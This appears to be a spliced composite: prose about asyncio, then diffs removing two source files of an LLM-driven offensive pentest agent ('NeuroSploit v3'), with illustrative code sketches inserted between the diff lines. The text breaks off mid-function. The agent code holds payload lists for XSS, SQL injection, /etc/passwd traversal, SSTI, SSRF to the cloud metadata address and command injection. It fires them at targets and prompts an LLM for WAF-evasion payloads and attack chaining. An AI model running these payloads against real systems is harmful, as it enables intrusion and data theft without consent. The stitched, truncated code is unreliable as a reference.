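The parallel phases rely on `asyncio.gather(..., return_exceptions=True)` and then pair each result with its agent name. A minimal sketch of that pattern follows; the two coroutines and `run_phase` are hypothetical stand-ins for the real agents.

```python
import asyncio
from typing import Dict, List, Tuple


async def recon() -> List[str]:
    return ["/login", "/api/users"]


async def cve_hunter() -> List[str]:
    raise RuntimeError("CVE feed unavailable")


async def run_phase() -> Tuple[Dict[str, List[str]], Dict[str, str]]:
    """Run both stand-in agents concurrently; split successes from failures."""
    tasks = [("recon", recon()), ("cve_hunter", cve_hunter())]
    results = await asyncio.gather(
        *[coro for _, coro in tasks],
        return_exceptions=True,  # exceptions come back as values, not raised
    )
    succeeded: Dict[str, List[str]] = {}
    failed: Dict[str, str] = {}
    # gather() preserves input order, so zip() pairs each name with its result.
    for (name, _), res in zip(tasks, results):
        if isinstance(res, Exception):
            failed[name] = str(res)
        else:
            succeeded[name] = res
    return succeeded, failed
```

With `return_exceptions=True`, one failing agent does not abort its sibling: the phase still collects whatever the other agent produced and records the failure separately.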
@@ -1,372 +0,0 @@
"""
NeuroSploit v3 - Agent Task Manager
Sub-task spawning and tracking system with priority queue.
Enables concurrent task execution with dependency awareness.
Inspired by CAI framework's agent-as-tool and task delegation patterns.
"""
import asyncio
import uuid
import time
from dataclasses import dataclass, field
from typing import Dict, List, Any, Optional, Callable, Awaitable
from enum import Enum
class TaskType(Enum):
"""Types of agent sub-tasks."""
TEST_ENDPOINT = "test_endpoint"
VERIFY_FINDING = "verify_finding"
SEARCH_CVE = "search_cve"
GENERATE_POC = "generate_poc"
CHAIN_EXPLORE = "chain_explore"
DEEP_TEST = "deep_test"
RECON_EXPAND = "recon_expand"
BANNER_CHECK = "banner_check"
MUTATE_TEST = "mutate_test"
class TaskStatus(Enum):
"""Task lifecycle states."""
PENDING = "pending"
RUNNING = "running"
COMPLETED = "completed"
FAILED = "failed"
CANCELLED = "cancelled"
# Priority levels (lower number = higher priority)
PRIORITY_CRITICAL = 1 # RCE, auth bypass, chain exploitation
PRIORITY_HIGH = 2 # Confirmed reflection, SQL error, SSRF indicators
PRIORITY_MEDIUM = 3 # Standard vulnerability testing
PRIORITY_LOW = 4 # Info disclosure, header checks
PRIORITY_INFO = 5 # Enhancement, non-critical recon
@dataclass
class AgentTask:
"""A discrete task that can be assigned to the agent or a specialist."""
id: str = ""
task_type: str = TaskType.TEST_ENDPOINT.value
priority: int = PRIORITY_MEDIUM
target: str = ""
parameters: Dict = field(default_factory=dict)
status: str = TaskStatus.PENDING.value
result: Any = None
error: str = ""
created_at: float = 0.0
started_at: float = 0.0
completed_at: float = 0.0
source: str = "" # What created this task (e.g., "chain_engine", "reasoning")
def __post_init__(self):
if not self.id:
self.id = uuid.uuid4().hex[:12]
if not self.created_at:
self.created_at = time.time()
def __lt__(self, other):
"""For PriorityQueue comparison — lower priority number = higher priority."""
if not isinstance(other, AgentTask):
return NotImplemented
return self.priority < other.priority
@property
def age_seconds(self) -> float:
return time.time() - self.created_at
@property
def duration_seconds(self) -> Optional[float]:
if self.started_at and self.completed_at:
return self.completed_at - self.started_at
return None
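# Illustrative sketch (not part of the original module): how a priority-only
# __lt__ drives ordering in a heap-backed queue. DemoTask is a hypothetical
# stand-in for AgentTask that keeps just the fields needed for the comparison.

```python
import heapq
from dataclasses import dataclass


@dataclass
class DemoTask:
    """Hypothetical stand-in for AgentTask (assumption: only priority matters)."""
    name: str
    priority: int = 3

    def __lt__(self, other):
        # Lower priority number sorts first, mirroring AgentTask.__lt__
        if not isinstance(other, DemoTask):
            return NotImplemented
        return self.priority < other.priority


def drain_in_priority_order(tasks):
    """Return task names in the order a priority queue would hand them out."""
    heap = list(tasks)
    heapq.heapify(heap)
    return [heapq.heappop(heap).name for _ in range(len(heap))]


ORDER = drain_in_priority_order([
    DemoTask("header-check", 4),
    DemoTask("rce-followup", 1),
    DemoTask("standard-test", 3),
])
```

# Tasks with equal priority are not guaranteed to come out in submission order,
# because the comparison looks at the priority number only.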
class AgentTaskManager:
"""Manages agent sub-tasks with priority queue and concurrent execution.
Tasks are submitted with priorities and processed concurrently.
Supports task cancellation, status tracking, and result collection.
"""
MAX_QUEUE_SIZE = 500
MAX_COMPLETED = 200
def __init__(self, max_concurrent: int = 5):
self.max_concurrent = max_concurrent
self._queue: asyncio.PriorityQueue = asyncio.PriorityQueue(
maxsize=self.MAX_QUEUE_SIZE
)
self._running: Dict[str, AgentTask] = {}
self._completed: List[AgentTask] = []
self._failed: List[AgentTask] = []
self._cancelled = False
self._semaphore = asyncio.Semaphore(max_concurrent)
self._total_submitted = 0
self._total_completed = 0
self._total_failed = 0
# ── Task Submission ──
async def submit(self, task: AgentTask) -> str:
"""Submit task to priority queue. Returns task ID."""
if self._cancelled:
return ""
if self._queue.full():
# Queue is full: reject the new task instead of evicting a queued one.
# asyncio.PriorityQueue has no API for removing an arbitrary queued item.
return ""
try:
self._queue.put_nowait(task)
self._total_submitted += 1
return task.id
except asyncio.QueueFull:
return ""
def submit_sync(self, task: AgentTask) -> str:
"""Synchronous submit (for use in non-async contexts)."""
try:
self._queue.put_nowait(task)
self._total_submitted += 1
return task.id
except Exception:  # includes asyncio.QueueFull
return ""
async def submit_batch(self, tasks: List[AgentTask]) -> List[str]:
"""Submit multiple tasks at once."""
ids = []
for task in tasks:
tid = await self.submit(task)
if tid:
ids.append(tid)
return ids
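# Illustrative sketch (not part of the original module): what "submit returns
# an empty ID when the queue is full" looks like with a bounded
# asyncio.PriorityQueue. try_enqueue and the (priority, label) tuples are
# hypothetical names used only for this example.

```python
import asyncio


def try_enqueue(queue, priority, label):
    """Return True if the item was queued, False if the queue was full."""
    try:
        queue.put_nowait((priority, label))
        return True
    except asyncio.QueueFull:
        return False


async def demo():
    queue = asyncio.PriorityQueue(maxsize=2)
    accepted = [
        try_enqueue(queue, priority, label)
        for priority, label in [(3, "a"), (1, "b"), (2, "c")]
    ]
    first = await queue.get()  # lowest priority number comes out first
    return accepted, first


ACCEPTED, FIRST = asyncio.run(demo())
```

# The third item is rejected even though it outranks "a": a full queue turns
# away new work regardless of its priority.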
# ── Task Execution ──
async def run_tasks(self, executor: Callable[[AgentTask], Awaitable[Any]],
cancel_check: Optional[Callable[[], bool]] = None,
progress_callback: Optional[Callable[[Dict], Awaitable]] = None
) -> List[AgentTask]:
"""Process queue with concurrent execution.
Args:
executor: Async function that executes a single task
cancel_check: Optional function that returns True to stop
progress_callback: Optional async callback for progress updates
Returns:
List of completed tasks
"""
workers = []
completed_in_run = []
async def worker():
while not self._cancelled:
if cancel_check and cancel_check():
break
try:
task = await asyncio.wait_for(
self._queue.get(), timeout=2.0
)
except asyncio.TimeoutError:
# Check if queue is permanently empty
if self._queue.empty():
break
continue
if self._cancelled or (cancel_check and cancel_check()):
break
async with self._semaphore:
task.status = TaskStatus.RUNNING.value
task.started_at = time.time()
self._running[task.id] = task
try:
result = await executor(task)
task.result = result
task.status = TaskStatus.COMPLETED.value
task.completed_at = time.time()
self._total_completed += 1
completed_in_run.append(task)
# Bounded completed list
self._completed.append(task)
if len(self._completed) > self.MAX_COMPLETED:
self._completed = self._completed[-self.MAX_COMPLETED:]
except Exception as e:
task.error = str(e)
task.status = TaskStatus.FAILED.value
task.completed_at = time.time()
self._total_failed += 1
self._failed.append(task)
finally:
self._running.pop(task.id, None)
if progress_callback:
try:
await progress_callback(self.get_status())
except Exception:
pass
# Spawn workers
for _ in range(min(self.max_concurrent, max(1, self._queue.qsize()))):
workers.append(asyncio.create_task(worker()))
if workers:
await asyncio.gather(*workers, return_exceptions=True)
return completed_in_run
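# Illustrative sketch (not part of the original module): a simplified worker
# pool over a priority queue. It assumes every item is queued before the pool
# starts, so workers can exit on QueueEmpty instead of polling with a timeout.
# run_pool, handler and _double are hypothetical names.

```python
import asyncio


async def run_pool(items, handler, max_concurrent=3):
    """Process (priority, payload) items with at most max_concurrent workers."""
    queue = asyncio.PriorityQueue()
    for item in items:
        queue.put_nowait(item)
    results = []

    async def worker():
        while True:
            try:
                _priority, payload = queue.get_nowait()
            except asyncio.QueueEmpty:
                return  # nothing left, so this worker is done
            try:
                results.append((payload, await handler(payload)))
            except Exception as exc:
                # Record the failure and keep the worker alive
                results.append((payload, exc))

    count = min(max_concurrent, max(1, queue.qsize()))
    await asyncio.gather(*(worker() for _ in range(count)))
    return results


async def _double(value):
    await asyncio.sleep(0)
    return value * 2


RESULTS = asyncio.run(run_pool([(2, 10), (1, 5), (3, 7)], _double, max_concurrent=1))
```

# With a single worker the results follow priority order; with several workers
# the completion order depends on how long each handler call takes.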
async def drain(self, executor: Callable[[AgentTask], Awaitable[Any]],
cancel_check: Optional[Callable[[], bool]] = None,
timeout: float = 300.0) -> List[AgentTask]:
"""Run all queued tasks with a timeout."""
try:
return await asyncio.wait_for(
self.run_tasks(executor, cancel_check),
timeout=timeout,
)
except asyncio.TimeoutError:
self.cancel()
return list(self._completed[-50:])
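# Illustrative sketch (not part of the original module): the deadline pattern
# used by drain(), reduced to a helper. run_with_deadline, _slow and _fast are
# hypothetical names; the fallback value stands in for partial results.

```python
import asyncio


async def run_with_deadline(make_coro, timeout, fallback):
    """Await make_coro(), giving up after `timeout` seconds and returning `fallback`."""
    try:
        return await asyncio.wait_for(make_coro(), timeout=timeout)
    except asyncio.TimeoutError:
        # wait_for has already cancelled the inner coroutine at this point
        return fallback


async def _slow():
    await asyncio.sleep(5)
    return "finished"


async def _fast():
    return "finished"


SLOW_RESULT = asyncio.run(run_with_deadline(_slow, 0.05, "timed out"))
FAST_RESULT = asyncio.run(run_with_deadline(_fast, 0.05, "timed out"))
```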
# ── Task Control ──
def cancel(self):
"""Cancel all pending tasks."""
self._cancelled = True
# Drain queue
while not self._queue.empty():
try:
task = self._queue.get_nowait()
task.status = TaskStatus.CANCELLED.value
except asyncio.QueueEmpty:
break
def reset(self):
"""Reset for new use."""
self._cancelled = False
self._queue = asyncio.PriorityQueue(maxsize=self.MAX_QUEUE_SIZE)
self._running.clear()
# ── Status & Queries ──
def get_status(self) -> Dict:
"""Return task manager status for logging/dashboard."""
return {
"queued": self._queue.qsize(),
"running": len(self._running),
"completed": self._total_completed,
"failed": self._total_failed,
"total_submitted": self._total_submitted,
"cancelled": self._cancelled,
}
@property
def is_empty(self) -> bool:
return self._queue.empty() and not self._running
@property
def pending_count(self) -> int:
return self._queue.qsize()
@property
def running_count(self) -> int:
return len(self._running)
def get_completed_results(self, task_type: Optional[str] = None) -> List[Any]:
"""Get results from completed tasks, optionally filtered by type."""
tasks = self._completed
if task_type:
tasks = [t for t in tasks if t.task_type == task_type]
return [t.result for t in tasks if t.result is not None]
def get_failed_tasks(self) -> List[AgentTask]:
"""Get failed tasks for retry or debugging."""
return list(self._failed[-50:])
# ── Task Factory Helpers ──
def create_test_task(url: str, vuln_type: str, params: Optional[Dict] = None,
priority: int = PRIORITY_MEDIUM,
source: str = "") -> AgentTask:
"""Create a test_endpoint task."""
return AgentTask(
task_type=TaskType.TEST_ENDPOINT.value,
priority=priority,
target=url,
parameters={
"vuln_type": vuln_type,
"params": params or {},
},
source=source,
)
def create_cve_task(software: str, version: str,
priority: int = PRIORITY_HIGH) -> AgentTask:
"""Create a search_cve task."""
return AgentTask(
task_type=TaskType.SEARCH_CVE.value,
priority=priority,
target=f"{software}/{version}",
parameters={
"software": software,
"version": version,
},
source="cve_hunter",
)
def create_chain_task(finding_type: str, finding_url: str,
chain_target: Dict,
priority: int = PRIORITY_HIGH) -> AgentTask:
"""Create a chain_explore task."""
return AgentTask(
task_type=TaskType.CHAIN_EXPLORE.value,
priority=priority,
target=finding_url,
parameters={
"source_vuln": finding_type,
"chain_target": chain_target,
},
source="chain_engine",
)
def create_deep_test_task(url: str, vuln_type: str, param: str,
mutation_context: Optional[Dict] = None,
priority: int = PRIORITY_HIGH) -> AgentTask:
"""Create a deep_test task (re-test with mutations)."""
return AgentTask(
task_type=TaskType.DEEP_TEST.value,
priority=priority,
target=url,
parameters={
"vuln_type": vuln_type,
"param": param,
"mutation_context": mutation_context or {},
},
source="payload_mutator",
)
def create_poc_task(finding_id: str, finding_type: str,
priority: int = PRIORITY_LOW) -> AgentTask:
"""Create a generate_poc task."""
return AgentTask(
task_type=TaskType.GENERATE_POC.value,
priority=priority,
target=finding_id,
parameters={"vuln_type": finding_type},
source="exploit_generator",
)
@@ -1,889 +0,0 @@
"""
NeuroSploit v3 - AI Offensive Security Agent
This is a TRUE AI AGENT that:
1. Uses LLM for INTELLIGENT vulnerability testing (not blind payloads)
2. Analyzes responses with AI to confirm vulnerabilities (to reduce false positives)
3. Uses recon data to inform testing strategy
4. Accepts custom .md prompt files
5. Generates real PoC code and exploitation steps
AUTHORIZATION: This is an authorized penetration testing tool.
All actions are performed with explicit permission.
"""
import asyncio
import aiohttp
import json
import re
import os
import sys
from typing import Dict, List, Any, Optional, Callable, Tuple
from dataclasses import dataclass, field
from datetime import datetime
from urllib.parse import urljoin, urlparse, parse_qs, urlencode, quote
from enum import Enum
from pathlib import Path
# Add parent path for imports
sys.path.insert(0, str(Path(__file__).parent.parent.parent))
try:
from core.llm_manager import LLMManager
except ImportError:
LLMManager = None
class AgentAction(Enum):
"""Actions the agent can take"""
DISCOVER = "discover"
TEST = "test"
EXPLOIT = "exploit"
CHAIN = "chain"
REPORT = "report"
PIVOT = "pivot"
@dataclass
class Finding:
"""A vulnerability finding with exploitation details"""
vuln_type: str
severity: str
endpoint: str
payload: str
evidence: str
exploitable: bool
confidence: str = "high" # high, medium, low
exploitation_steps: List[str] = field(default_factory=list)
poc_code: str = ""
impact: str = ""
chained_with: List[str] = field(default_factory=list)
raw_request: str = ""
raw_response: str = ""
llm_analysis: str = ""
@dataclass
class AgentState:
"""Current state of the AI agent"""
target: str
discovered_endpoints: List[str] = field(default_factory=list)
discovered_params: Dict[str, List[str]] = field(default_factory=dict)
technologies: List[str] = field(default_factory=list)
findings: List[Finding] = field(default_factory=list)
tested_payloads: Dict[str, List[str]] = field(default_factory=dict)
session_cookies: Dict[str, str] = field(default_factory=dict)
auth_tokens: List[str] = field(default_factory=list)
waf_detected: bool = False
waf_type: str = ""
current_phase: str = "recon"
actions_taken: List[str] = field(default_factory=list)
recon_context: Optional[Dict] = None
class AIPentestAgent:
"""
Autonomous AI Agent for Offensive Security Testing
This agent uses LLM to make INTELLIGENT decisions:
- What to test based on recon data
- How to craft context-aware payloads
- How to analyze responses to CONFIRM vulnerabilities
- How to chain attacks for maximum impact
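Findings are reported only after a heuristic check and, when an LLM is
configured, an LLM confirmation step. This reduces false positives but does
not eliminate them.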
"""
def __init__(
self,
target: str,
llm_manager: Optional[Any] = None,
log_callback: Optional[Callable] = None,
auth_headers: Optional[Dict] = None,
max_depth: int = 5,
prompt_file: Optional[str] = None,
recon_context: Optional[Dict] = None,
config: Optional[Dict] = None
):
self.target = target
self.llm_manager = llm_manager
self.log = log_callback or self._default_log
self.auth_headers = auth_headers or {}
self.max_depth = max_depth
self.prompt_file = prompt_file
self.custom_prompt = None
self.config = config or {}
self.state = AgentState(target=target, recon_context=recon_context)
self.session: Optional[aiohttp.ClientSession] = None
# Load custom prompt if provided
if prompt_file:
self._load_custom_prompt(prompt_file)
# Initialize LLM manager if not provided
if not self.llm_manager and LLMManager and config:
try:
self.llm_manager = LLMManager(config)
except Exception as e:
print(f"Warning: Could not initialize LLM manager: {e}")
# Base payloads - LLM will enhance these based on context
self.base_payloads = self._load_base_payloads()
async def _default_log(self, level: str, message: str):
print(f"[{level.upper()}] {message}")
def _load_custom_prompt(self, prompt_file: str):
"""Load custom prompt from .md file"""
try:
path = Path(prompt_file)
if not path.exists():
# Try in prompts directory
path = Path("prompts") / prompt_file
if not path.exists():
path = Path("prompts/md_library") / prompt_file
if path.exists():
content = path.read_text()
self.custom_prompt = content
print(f"[+] Loaded custom prompt from: {path}")
else:
print(f"[!] Prompt file not found: {prompt_file}")
except Exception as e:
print(f"[!] Error loading prompt file: {e}")
def _load_base_payloads(self) -> Dict[str, List[str]]:
"""Load base attack payloads - LLM will enhance these"""
return {
"xss": [
"<script>alert(1)</script>",
"\"><script>alert(1)</script>",
"'-alert(1)-'",
"<img src=x onerror=alert(1)>",
],
"sqli": [
"'", "\"", "' OR '1'='1", "1' AND '1'='1",
"' UNION SELECT NULL--", "1' AND SLEEP(3)--",
],
"lfi": [
"../../../etc/passwd",
"....//....//etc/passwd",
"php://filter/convert.base64-encode/resource=index.php",
],
"ssti": [
"{{7*7}}", "${7*7}", "<%= 7*7 %>",
"{{config}}", "{{self.__class__}}",
],
"ssrf": [
"http://127.0.0.1", "http://localhost",
"http://169.254.169.254/latest/meta-data/",
],
"rce": [
"; id", "| id", "$(id)", "`id`",
],
}
async def __aenter__(self):
connector = aiohttp.TCPConnector(ssl=False, limit=10)
timeout = aiohttp.ClientTimeout(total=30)
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"}
headers.update(self.auth_headers)
self.session = aiohttp.ClientSession(connector=connector, timeout=timeout, headers=headers)
return self
async def __aexit__(self, *args):
if self.session:
await self.session.close()
async def run(self) -> Dict[str, Any]:
"""
Main agent loop - Think, Act, Observe, Adapt
Uses LLM for intelligent decision making at each step.
"""
await self.log("info", "=" * 60)
await self.log("info", "AI OFFENSIVE SECURITY AGENT ACTIVATED")
await self.log("info", "=" * 60)
await self.log("info", f"Target: {self.target}")
await self.log("info", "Mode: LLM-POWERED INTELLIGENT TESTING")
if self.custom_prompt:
await self.log("info", f"Custom prompt loaded: {len(self.custom_prompt)} chars")
await self.log("info", "")
try:
# Phase 1: Reconnaissance (use recon data if available)
await self.log("info", "[PHASE 1] RECONNAISSANCE")
await self._recon_phase()
# Phase 2: LLM-Powered Vulnerability Testing
await self.log("info", "")
await self.log("info", "[PHASE 2] INTELLIGENT VULNERABILITY TESTING")
await self._testing_phase()
# Phase 3: Exploitation (only confirmed vulnerabilities)
if self.state.findings:
await self.log("info", "")
await self.log("info", "[PHASE 3] EXPLOITATION")
await self._exploitation_phase()
# Phase 4: Attack Chaining
if len(self.state.findings) > 1:
await self.log("info", "")
await self.log("info", "[PHASE 4] ATTACK CHAINING")
await self._chaining_phase()
# Generate Report
await self.log("info", "")
await self.log("info", "[PHASE 5] REPORT GENERATION")
report = await self._generate_report()
return report
except Exception as e:
await self.log("error", f"Agent error: {str(e)}")
import traceback
traceback.print_exc()
return {"error": str(e), "findings": [f.__dict__ for f in self.state.findings]}
async def _recon_phase(self):
"""Reconnaissance - use existing recon data or perform basic discovery"""
# Use recon context if available
if self.state.recon_context:
await self.log("info", " Using provided recon context...")
await self._load_recon_context()
else:
await self.log("info", " Performing basic reconnaissance...")
await self._basic_recon()
await self.log("info", f" Found {len(self.state.discovered_endpoints)} endpoints")
await self.log("info", f" Found {sum(len(v) for v in self.state.discovered_params.values())} parameters")
await self.log("info", f" Technologies: {', '.join(self.state.technologies[:5]) or 'Unknown'}")
async def _load_recon_context(self):
"""Load data from recon context"""
ctx = self.state.recon_context
# Load endpoints from various recon sources
if ctx.get("data", {}).get("endpoints"):
self.state.discovered_endpoints.extend(ctx["data"]["endpoints"][:100])
if ctx.get("data", {}).get("urls"):
self.state.discovered_endpoints.extend(ctx["data"]["urls"][:100])
if ctx.get("data", {}).get("crawled_urls"):
self.state.discovered_endpoints.extend(ctx["data"]["crawled_urls"][:100])
# Load parameters
if ctx.get("data", {}).get("parameters"):
for param_data in ctx["data"]["parameters"]:
if isinstance(param_data, dict):
url = param_data.get("url", self.target)
params = param_data.get("params", [])
self.state.discovered_params[url] = params
elif isinstance(param_data, str):
self.state.discovered_params[self.target] = self.state.discovered_params.get(self.target, []) + [param_data]
# Load technologies
if ctx.get("data", {}).get("technologies"):
self.state.technologies.extend(ctx["data"]["technologies"])
# Load from attack surface
if ctx.get("attack_surface"):
surface = ctx["attack_surface"]
if surface.get("live_urls"):
for host in surface.get("live_urls", [])[:50]:
if host not in self.state.discovered_endpoints:
self.state.discovered_endpoints.append(host)
# Deduplicate while preserving discovery order
self.state.discovered_endpoints = list(dict.fromkeys(self.state.discovered_endpoints))
async def _basic_recon(self):
"""Perform basic reconnaissance when no recon data is available"""
# Fingerprint
await self._fingerprint_target()
# Discover common endpoints
common_paths = [
"/", "/login", "/admin", "/api", "/api/v1",
"/user", "/search", "/upload", "/config",
"/?id=1", "/?page=1", "/?q=test",
]
parsed = urlparse(self.target)
base_url = f"{parsed.scheme}://{parsed.netloc}"
for path in common_paths:
url = urljoin(base_url, path)
try:
async with self.session.get(url, allow_redirects=False) as resp:
if resp.status < 400:
self.state.discovered_endpoints.append(url)
# Extract params
if "?" in url:
parsed_url = urlparse(url)
params = list(parse_qs(parsed_url.query).keys())
self.state.discovered_params[url] = params
except Exception:
pass
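# Illustrative sketch (not part of the original module): extracting parameter
# names from a URL the way _basic_recon does. query_param_names is a
# hypothetical helper. It passes keep_blank_values=True, which is an assumption
# beyond the original code: by default parse_qs drops parameters with empty
# values such as "page=".

```python
from urllib.parse import parse_qs, urlparse


def query_param_names(url):
    """Return the query parameter names of `url`, including blank-valued ones."""
    query = urlparse(url).query
    return list(parse_qs(query, keep_blank_values=True).keys())


NAMES = query_param_names("http://example.test/?id=1&page=")
NO_QUERY = query_param_names("http://example.test/login")
```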
async def _fingerprint_target(self):
"""Fingerprint the target"""
try:
async with self.session.get(self.target) as resp:
body = await resp.text()
headers = dict(resp.headers)
# Server detection
server = headers.get("Server", "")
if server:
self.state.technologies.append(f"Server: {server}")
# X-Powered-By
powered = headers.get("X-Powered-By", "")
if powered:
self.state.technologies.append(powered)
# Technology signatures
tech_sigs = {
"PHP": [".php", "PHPSESSID"],
"ASP.NET": [".aspx", "__VIEWSTATE"],
"Java": [".jsp", "JSESSIONID"],
"Python": ["django", "flask"],
"Node.js": ["express", "connect.sid"],
"WordPress": ["wp-content", "wp-includes"],
"Laravel": ["laravel", "XSRF-TOKEN"],
}
for tech, sigs in tech_sigs.items():
for sig in sigs:
if sig.lower() in body.lower() or sig in str(headers):
if tech not in self.state.technologies:
self.state.technologies.append(tech)
break
except Exception as e:
await self.log("debug", f"Fingerprint error: {e}")
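# Illustrative sketch (not part of the original module): the signature matching
# from _fingerprint_target as a pure function. detect_technologies and
# SIGNATURES are hypothetical names. Unlike the original, this version matches
# headers case-insensitively, which is an assumption made for simplicity.

```python
def detect_technologies(body, headers, signatures):
    """Return the technologies whose signatures appear in the body or headers."""
    header_text = " ".join(f"{key}: {value}" for key, value in headers.items())
    haystack = f"{body} {header_text}".lower()
    return [
        tech
        for tech, sigs in signatures.items()
        if any(sig.lower() in haystack for sig in sigs)
    ]


SIGNATURES = {
    "PHP": [".php", "PHPSESSID"],
    "Java": [".jsp", "JSESSIONID"],
    "WordPress": ["wp-content", "wp-includes"],
}

FROM_BODY = detect_technologies('<a href="/index.php">home</a>', {"Server": "nginx"}, SIGNATURES)
FROM_HEADERS = detect_technologies("", {"Set-Cookie": "JSESSIONID=abc"}, SIGNATURES)
```

# Substring signatures are a coarse heuristic: a page that merely links to a
# .php URL on another site would also be labelled PHP.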
async def _testing_phase(self):
"""LLM-powered vulnerability testing"""
# Determine what to test based on recon data
test_strategy = await self._get_test_strategy()
# Get endpoints to test
endpoints = self.state.discovered_endpoints[:20] or [self.target]
for endpoint in endpoints:
await self.log("info", f" Testing: {endpoint[:60]}...")
for vuln_type in test_strategy:
# Get LLM-enhanced payloads for this context
payloads = await self._get_smart_payloads(endpoint, vuln_type)
for payload in payloads[:5]:
result = await self._test_and_verify(endpoint, vuln_type, payload)
if result and result.get("confirmed"):
finding = Finding(
vuln_type=vuln_type,
severity=self._get_severity(vuln_type),
endpoint=endpoint,
payload=payload,
evidence=result.get("evidence", ""),
exploitable=result.get("exploitable", False),
confidence=result.get("confidence", "high"),
llm_analysis=result.get("analysis", ""),
raw_request=result.get("request", ""),
raw_response=result.get("response", "")[:2000],
impact=self._get_impact(vuln_type),
)
self.state.findings.append(finding)
await self.log("warning", f" [CONFIRMED] {vuln_type.upper()} - {result.get('confidence', 'high')} confidence")
break # Found vuln, move to next type
async def _get_test_strategy(self) -> List[str]:
"""Use LLM to determine what to test based on recon data"""
# Default strategy
default_strategy = ["xss", "sqli", "lfi", "ssti", "ssrf"]
if not self.llm_manager:
return default_strategy
try:
# Build context for LLM
context = {
"target": self.target,
"technologies": self.state.technologies,
"endpoints_count": len(self.state.discovered_endpoints),
"parameters_count": sum(len(v) for v in self.state.discovered_params.values()),
"sample_endpoints": self.state.discovered_endpoints[:5],
}
prompt = f"""Based on the following reconnaissance data, determine the most likely vulnerability types to test.
Target: {context['target']}
Technologies detected: {', '.join(context['technologies']) or 'Unknown'}
Endpoints found: {context['endpoints_count']}
Parameters found: {context['parameters_count']}
Sample endpoints: {context['sample_endpoints']}
Custom instructions: {self.custom_prompt[:500] if self.custom_prompt else 'None'}
Return a JSON array of vulnerability types to test, ordered by likelihood.
Valid types: xss, sqli, lfi, rce, ssti, ssrf, xxe, idor, open_redirect
Example: ["sqli", "xss", "lfi"]
IMPORTANT: Only return the JSON array, no other text."""
response = self.llm_manager.generate(prompt, "You are a penetration testing expert. Analyze recon data and suggest vulnerability tests.")
# Parse response
try:
# Find JSON array in response
match = re.search(r'\[.*?\]', response, re.DOTALL)
if match:
strategy = json.loads(match.group())
if isinstance(strategy, list) and len(strategy) > 0:
return strategy[:7]
except Exception:
pass
except Exception as e:
await self.log("debug", f"LLM strategy error: {e}")
return default_strategy
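# Illustrative sketch (not part of the original module): parsing the LLM's
# strategy reply and filtering it against the valid types listed in the prompt.
# parse_strategy and VALID_TYPES are hypothetical names; the original method
# returns the parsed list without this allow-list filtering.

```python
import json
import re

VALID_TYPES = {
    "xss", "sqli", "lfi", "rce", "ssti", "ssrf", "xxe", "idor", "open_redirect",
}


def parse_strategy(response, default, limit=7):
    """Extract a JSON array of known vulnerability types, else return `default`."""
    match = re.search(r"\[.*?\]", response, re.DOTALL)
    if not match:
        return list(default)
    try:
        parsed = json.loads(match.group())
    except json.JSONDecodeError:
        return list(default)
    if not isinstance(parsed, list):
        return list(default)
    cleaned = []
    for item in parsed:
        if isinstance(item, str):
            name = item.strip().lower()
            # Keep only known types, normalised and without duplicates
            if name in VALID_TYPES and name not in cleaned:
                cleaned.append(name)
    return cleaned[:limit] or list(default)


STRATEGY = parse_strategy('Sure: ["SQLi", "xss", "made_up", "xss"]', ["xss"])
FALLBACK = parse_strategy("no JSON here", ["xss", "sqli"])
```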
async def _get_smart_payloads(self, endpoint: str, vuln_type: str) -> List[str]:
"""Get context-aware payloads from LLM"""
base = self.base_payloads.get(vuln_type, [])
if not self.llm_manager:
return base
try:
# Get endpoint context
params = self.state.discovered_params.get(endpoint, [])
techs = self.state.technologies
prompt = f"""Generate 3 specialized {vuln_type.upper()} payloads for this context:
Endpoint: {endpoint}
Parameters: {params}
Technologies: {techs}
WAF detected: {self.state.waf_detected} ({self.state.waf_type})
Requirements:
1. Payloads should be tailored to the detected technologies
2. If WAF detected, use evasion techniques
3. Include both basic and advanced payloads
Return ONLY a JSON array of payload strings.
Example: ["payload1", "payload2", "payload3"]"""
response = self.llm_manager.generate(prompt, "You are a security researcher. Generate effective but safe test payloads.")
try:
match = re.search(r'\[.*?\]', response, re.DOTALL)
if match:
smart_payloads = json.loads(match.group())
if isinstance(smart_payloads, list):
return smart_payloads + base
except Exception:
pass
except Exception as e:
await self.log("debug", f"Smart payload error: {e}")
return base
async def _test_and_verify(self, endpoint: str, vuln_type: str, payload: str) -> Optional[Dict]:
"""Test a payload and use LLM to verify if it's a real vulnerability"""
try:
# Prepare request
parsed = urlparse(endpoint)
base_url = f"{parsed.scheme}://{parsed.netloc}{parsed.path}"
# Build params with payload
params = {}
if parsed.query:
for p in parsed.query.split("&"):
if "=" in p:
k, v = p.split("=", 1)
params[k] = payload
else:
test_params = self.state.discovered_params.get(endpoint, []) or ["id", "q", "search"]
for p in test_params[:3]:
params[p] = payload
# Send request
async with self.session.get(base_url, params=params, allow_redirects=False) as resp:
body = await resp.text()
status = resp.status
headers = dict(resp.headers)
# Build raw request for logging
raw_request = f"GET {resp.url}\n"
raw_request += "\n".join([f"{k}: {v}" for k, v in self.auth_headers.items()])
# First, do quick checks for obvious indicators
quick_result = self._quick_vuln_check(vuln_type, payload, body, status, headers)
if not quick_result.get("possible"):
return None
# If possible vulnerability, use LLM to confirm
if self.llm_manager:
confirmation = await self._llm_confirm_vulnerability(
vuln_type, payload, body[:3000], status, headers, endpoint
)
if confirmation.get("confirmed"):
return {
"confirmed": True,
"evidence": confirmation.get("evidence", quick_result.get("evidence", "")),
"exploitable": confirmation.get("exploitable", False),
"confidence": confirmation.get("confidence", "medium"),
"analysis": confirmation.get("analysis", ""),
"request": raw_request,
"response": body[:2000],
}
else:
# No LLM, use quick check result
if quick_result.get("high_confidence"):
return {
"confirmed": True,
"evidence": quick_result.get("evidence", ""),
"exploitable": True,
"confidence": "medium",
"analysis": "Confirmed by response analysis (no LLM)",
"request": raw_request,
"response": body[:2000],
}
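except asyncio.TimeoutError:
# A timeout is weak evidence on its own, so only flag it for delay-based payloads
if vuln_type == "sqli" and "sleep" in payload.lower():
return {
"confirmed": True,
"evidence": "Request timeout - possible time-based SQL injection",
"exploitable": True,
"confidence": "medium",
"analysis": "Possible time-based blind SQLi (request timed out after a SLEEP payload)",
}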
except Exception as e:
await self.log("debug", f"Test error: {e}")
return None
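# Illustrative sketch (not part of the original module): one way to make the
# time-based check less noisy is to compare the injected request against a
# baseline latency instead of relying on a client timeout. looks_time_based and
# its parameters are hypothetical; the original code does not measure latency.

```python
from statistics import median


def looks_time_based(baseline_samples, injected_seconds, sleep_seconds, tolerance=0.5):
    """Return True if the injected request was slower by roughly `sleep_seconds`."""
    baseline = median(baseline_samples)
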